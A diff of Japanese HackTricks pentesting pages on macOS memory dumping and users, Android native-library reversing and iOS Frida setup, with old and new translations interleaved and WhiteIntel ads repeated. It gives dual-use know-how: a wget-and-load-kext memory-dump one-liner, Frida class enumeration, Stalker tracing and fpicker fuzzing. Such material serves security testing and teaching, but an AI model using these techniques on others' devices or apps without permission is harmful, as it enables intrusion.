**その他のエラー**は、「セキュリティとプライバシー --> 一般」で**kextの読み込みを許可**することで修正できるかもしれません。単に**許可**してください。
**その他のエラー**は、"セキュリティとプライバシー --> 一般"で**kextの読み込みを許可**することで修正できるかもしれません。単に**許可**してください。
また、の**ワンライナー**を使用してアプリケーションをダウンロードし、kextをロードしてメモリをダンプすることもできます
また、の**ワンライナー**を使用してアプリケーションをダウンロードし、kextをロードしてメモリをダンプすることもできます
{% code overflow="wrap" %}
```bash
@ -62,16 +76,28 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
```
{% endcode %}
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難型マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **をチェックしてください!**
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **をフォローしてください。**
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>

22
macos-hardening/macos-security-and-privilege-escalation/macos-users.md
View file

@ -7,16 +7,30 @@
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
* [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を入手す
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) をフォローする
* **ハッキングテクニックを共有するは、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください**
* **ハッキングテクニックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
### 一般ユーザー
* **Daemon**: システムデーモン用に予約されたユーザー。デフォルトのデーモンアカウント名は通常 "\_" で始まります:
* **Daemon**: システムデーモン用に予約されたユーザー。デフォルトのデーモンアカウント名は通常 "\_" で始まります:
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
@ -36,6 +50,6 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
### ユーザー権限
* **Standard User:** 最も基本的なユーザー。このユーザーは、ソフトウェアのインストールやその他の高度なタスクを実行しようとする際には、管理者ユーザーから権限を付与される必要があります。自分自身ではそれを行うことはできません。
* **Admin User**: ほとんどの時間を標準ユーザーとして操作するユーザーですが、ソフトウェアのインストールやその他の管理タスクなど、rootアクションを実行することが許可されています。管理者グループに属するすべてのユーザーは、**sudoersファイルを介してrootにアクセス権限が与えられます**。
* **Admin User**: ほとんどの時間を標準ユーザーとして操作するユーザーですが、ソフトウェアのインストールやその他の管理タスクなど、rootアクションを実行することが許可されています。管理者グループに属するすべてのユーザーは、**sudoersファイルを介してrootへのアクセス権限を与えられます**。
* **Root**: Rootはほとんどのアクションを実行することが許可されているユーザーですシステムインテグリティ保護などによる制限があります
* たとえば、rootは`/System`内にファイルを配置することはできません。

103
mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View file

@ -2,71 +2,100 @@
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **Discordグループ** 💬 に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@carlospolopm** をフォローする。
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>
**詳細については、[https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)** をチェックしてください。
## WhiteIntel
Androidアプリは、パフォーマンス重視のタスクにネイティブライブラリ通常はCまたはC++で記述を使用することができます。マルウェア作成者もこれらのライブラリを使用し、DEXバイトコードよりもリバースエンジニアリングが難しいためです。このセクションでは、Androidに特化したリバースエンジニアリングスキルが強調されており、アセンブリ言語の教育ではありません。互換性のために、ARMおよびx86バージョンのライブラリが提供されています。
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
### 主なポイント:
- **Androidアプリのネイティブライブラリ**
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ** を活用した検索エンジンで、企業やその顧客が **stealer malwares** によって **侵害** を受けているかどうかをチェックする **無料** 機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料** でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
**詳細はこちら: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
Androidアプリは、パフォーマンス重視のタスクには一般的にCまたはC++で書かれたネイティブライブラリを使用します。マルウェア作成者もこれらのライブラリを使用し、DEXバイトコードよりもリバースエンジニアリングが難しいためです。このセクションでは、Android向けに調整されたリバースエンジニアリングスキルが強調されており、アセンブリ言語の教育ではありません。互換性のためにARMおよびx86バージョンのライブラリが提供されています。
### 主なポイント:
- **Androidアプリのネイティブライブラリ:**
- パフォーマンス重視のタスクに使用されます。
- CまたはC++で記述されており、リバースエンジニアリングが難しいです。
- CまたはC++で書かれており、リバースエンジニアリングが難しいです。
- `.so`共有オブジェクト形式で見つかり、Linuxバイナリに類似しています。
- マルウェア作成者は、解析を難しくするためにネイティブコードを好みます。
- マルウェア作成者は、析を難しくするためにネイティブコードを好みます。
- **Java Native InterfaceJNIAndroid NDK**
- **Java Native InterfaceJNIAndroid NDK:**
- JNIは、Javaメソッドをネイティブコードで実装することを可能にします。
- NDKは、ネイティブコードを記述するためのAndroid固有のツールセットです。
- NDKは、ネイティブコードを書くためのAndroid固有のツールセットです。
- JNIとNDKは、JavaまたはKotlinコードとネイティブライブラリを結びつけます。
- **ライブラリのロードと実行:**
- ライブラリは、`System.loadLibrary`または`System.load`を使用してメモリにロードされます。
- ライブラリのロード時に`JNI_OnLoad`が実行されます。
- **ライブラリのロードと実行:**
- ライブラリは `System.loadLibrary` または `System.load` を使用してメモリにロードされます。
- ライブラリのロード時に `JNI_OnLoad` が実行されます。
- Javaで宣言されたネイティブメソッドは、ネイティブ関数にリンクされ、実行を可能にします。
- **Javaメソッドをネイティブ関数にリンクする**
- **動的リンキング** ネイティブライブラリ内の関数名が特定のパターンに一致するため、自動的なリンキングが可能です。
- **静的リンキング** リンキングのために`RegisterNatives`を使用し、関数名や構造の柔軟性を提供します。
- **Javaメソッドをネイティブ関数にリンクする:**
- **動的リンキング:** ネイティブライブラリ内の関数名が特定のパターンに一致するため、自動的にリンクが可能です。
- **静的リンキング:** 関数の命名と構造に柔軟性を提供するために `RegisterNatives` を使用します。
- **リバースエンジニアリングツールとテクニック**
- GhidraやIDA Proなどのツールがネイティブライブラリの分析を支援します。
- `JNIEnv`JNI関数と相互作用を理解するために重要です。
- ライブラリのロード、メソッドのリンキング、ネイティブ関数の特定を練習するための演習が提供されています。
- **リバースエンジニアリングツールとテクニック:**
- GhidraやIDA Proなどのツールがネイティブライブラリの分析に役立ちます。
- `JNIEnv` はJNI関数と相互作用を理解するために重要です。
- ライブラリのロード、メソッドのリン、ネイティブ関数の特定を練習するための演習が提供されています。
### リソース
- **ARMアセンブリの学習**
### リソース:
- **ARMアセンブリの学習:**
- 基礎アーキテクチャの理解のために推奨されます。
- Azeria Labsの[ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/)がお勧めです。
- Azeria Labs の [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) をお勧めします。
- **JNINDKドキュメント**
- **JNINDKドキュメント:**
- [OracleのJNI仕様](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [AndroidのJNI Tips](https://developer.android.com/training/articles/perf-jni)
- [NDKを使ったはじめ方](https://developer.android.com/ndk/guides/)
- **ネイティブライブラリのデバッグ**
- **ネイティブライブラリのデバッグ:**
- [JEB Decompilerを使用してAndroidネイティブライブラリをデバッグする](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ** を活用した検索エンジンで、企業やその顧客が **stealer malwares** によって **侵害** を受けているかどうかをチェックする **無料** 機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料** でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
HackTricks をサポートする他の方法:
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **Discordグループ** 💬 に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@carlospolopm** をフォローする。
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>

107
mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
View file

@ -1,46 +1,60 @@
# iOS Fridaの設定
# iOS Frida Configuration
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出してください。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## Fridaのインストール
**JailbrokenデバイスにFridaをインストールする手順:**
1. Cydia/Sileoアプリを開く。
2. 管理 -> ソース -> 編集 -> 追加に移動する。
3. URLとして「https://build.frida.re」を入力する。
4. 新しく追加されたFridaソースに移動する。
5. Fridaパッケージをインストールする。
1. Cydia/Sileoアプリを開きます
2. 管理 -> ソース -> 編集 -> 追加に移動します。
3. URLとして「https://build.frida.re」を入力します。
4. 新しく追加されたFridaソースに移動します。
5. Fridaパッケージをインストールします。
**Corellium**を使用している場合は、[https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)からFridaリリースをダウンロードする必要があります`frida-gadget-[yourversion]-ios-universal.dylib.gz`、そしてFridaが求めるdylibの場所に展開してコピーする必要があります。例`/Users/[youruser]/.cache/frida/gadget-ios.dylib`
**Corellium**を使用している場合は、[https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)からFridaリリースをダウンロードする必要があります`frida-gadget-[yourversion]-ios-universal.dylib.gz`し、Fridaが要求するdylibの場所に展開してコピーする必要があります。例`/Users/[youruser]/.cache/frida/gadget-ios.dylib`
インストール後、PCでコマンド**`frida-ls-devices`**を使用してデバイスが表示されるかどうかを確認できますPCがアクセスできる必要があります。\
また、**`frida-ps -Uia`**を実行して、電話の実行中のプロセスを確認できます。
また、**`frida-ps -Uia`**を実行して、電話の実行プロセスを確認できます。
## JailbrokenデバイスなしアプリのパッチなしでのFrida
アプリのパッチなしでJailbrokenデバイスなしでFridaを使用する方法については、次のブログ投稿を参照してください[https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
アプリのパッチなしでJailbrokenデバイスを使用せずにFridaを使用する方法については、次のブログ投稿を参照してください[https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
## Fridaクライアントのインストール
**fridaツール**をインストールします
**fridaツール**をインストールします
```bash
pip install frida-tools
pip install frida
```
Fridaサーバーがインストールされ、デバイスが実行され、接続されている場合、**クライアント**が**動作している**かどうかを**確認**します
Fridaサーバーがインストールされ、デバイスが実行され、接続されている場合、**クライアント**が**動作している**かどうかを**確認**してください
```bash
frida-ls-devices # List devices
frida-ps -Uia # Get running processes
@ -65,13 +79,11 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
```
### すべてのクラスとメソッドを取得する
* オートコンプリート`frida -U <program>`を実行するだけ
* オートコンプリート: `frida -U <program>` を実行するだけ
<figure><img src="../../.gitbook/assets/image (687).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
* 利用可能なすべてのクラスを取得する(文字列でフィルタリング)
{% code title="/tmp/script.js" %}
```javascript
// frida -U <program> -l /tmp/script.js
@ -153,9 +165,9 @@ console.log("loaded");
### Frida Stalker
[ドキュメントから](https://frida.re/docs/stalker/#:~:text=Stalker%20is%20Frida's%20code%20tracing,every%20instruction%20which%20is%20executed.): StalkerはFridaのコード**トレースエンジン**です。スレッドを**追跡**し、実行されるすべての関数、**すべてのブロック**、さらにはすべての命令を**キャプチャ**することができます。
[ドキュメントから](https://frida.re/docs/stalker/): StalkerはFridaのコード**トレースエンジン**です。スレッドを**追跡**し、実行されるすべての関数、**すべてのブロック**、さらにはすべての命令を**キャプチャ**することができます。
Frida Stalkerを実装した例が[こちら](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)にあります。
Frida Stalkerを実装した例は[https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)にあります。
これは、関数が呼び出されるたびにFrida Stalkerをアタッチする別の例です
```javascript
@ -292,7 +304,7 @@ rpc.exports.fuzzer = f;
```
{% endcode %}
* **Fuzzerのコンパイル**
* **Fuzzerのコンパイル**:
```bash
# From inside fpicker clone
## Compile from "myfuzzer.js" to "harness.js"
@ -309,9 +321,9 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
{% endcode %}
{% hint style="danger" %}
この場合、各ペイロードの後にアプリを再起動したり状態を復元したりしていません。そのため、Fridaが**クラッシュ**を見つけた場合、その後の入力はアプリを**クラッシュさせる可能性**があります(アプリが不安定な状態にあるため)、たとえその入力がアプリを**クラッシュさせるべきでない**場合でも。
この場合、各ペイロードの後にアプリを再起動したり状態を復元したりしていません。そのため、Fridaが**クラッシュ**を見つけると、その後の入力も**アプリをクラッシュ**させる可能性があります(アプリが不安定な状態にあるため)、たとえその**入力がアプリをクラッシュさせるべきでない**場合でも。
さらに、FridaはiOSの例外シグナルにフックするため、**Fridaがクラッシュを見つけた場合**、おそらく**iOSクラッシュレポートは生成されない**でしょう。
さらに、FridaはiOSの例外シグナルにフックし、**Fridaがクラッシュを見つけると**、おそらく**iOSクラッシュレポートは生成されない**でしょう。
これを防ぐためには、たとえば、Fridaのクラッシュ後にアプリを再起動することができます。
{% endhint %}
@ -319,8 +331,8 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
### ログとクラッシュ
**macOSコンソール**または**`log`** cliを使用してmacOSのログを確認できます。\
**`idevicesyslog`**を使用してiOSからのログも確認できます。\
一部のログには**`<private>`**が追加され、情報が省略されることがあります。すべての情報を表示するには、[https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)からいくつかのプロファイルをインストールしてそのプライベート情報を有効にする必要があります。
**`idevicesyslog`**を使用してiOSからもログを確認できます。\
一部のログには**`<private>`**が追加されて情報が省略されます。すべての情報を表示するには、[https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)からいくつかのプロファイルをインストールしてそのプライベート情報を有効にする必要があります。
何をすべきかわからない場合は:
```sh
@ -336,8 +348,6 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist
killall -9 logd
```
iOSでのクラッシュを確認できます
* **iOS**
* Settings → Privacy → Analytics & Improvements → Analytics Data
* `/private/var/mobile/Library/Logs/CrashReporter/`
@ -346,28 +356,43 @@ iOSでのクラッシュを確認できます
* `~/Library/Logs/DiagnosticReports`
{% hint style="warning" %}
iOSは同じアプリのクラッシュを25件しか保存しないため、それをクリーンアップするか、iOSがクラッシュを作成するのを停止します。
iOS only stores 25 crashes of the same app, so you need to clean that or iOS will stop creating crashes.
{% endhint %}
## Frida Android チュートリアル
## Frida Android Tutorials
{% content-ref url="../android-app-pentesting/frida-tutorial/" %}
[frida-tutorial](../android-app-pentesting/frida-tutorial/)
{% endcontent-ref %}
## 参考文献
## References
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法
Other ways to support HackTricks:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローしてください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

34
network-services-pentesting/1723-pentesting-pptp.md
View file

@ -1,22 +1,36 @@
# 1723 - Pentesting PPTP
# 1723 - PPTPのペンテスト
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループに参加](https://discord.gg/hRep4RUj7f)**または[telegramグループに参加](https://t.me/peass)し、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**してください。
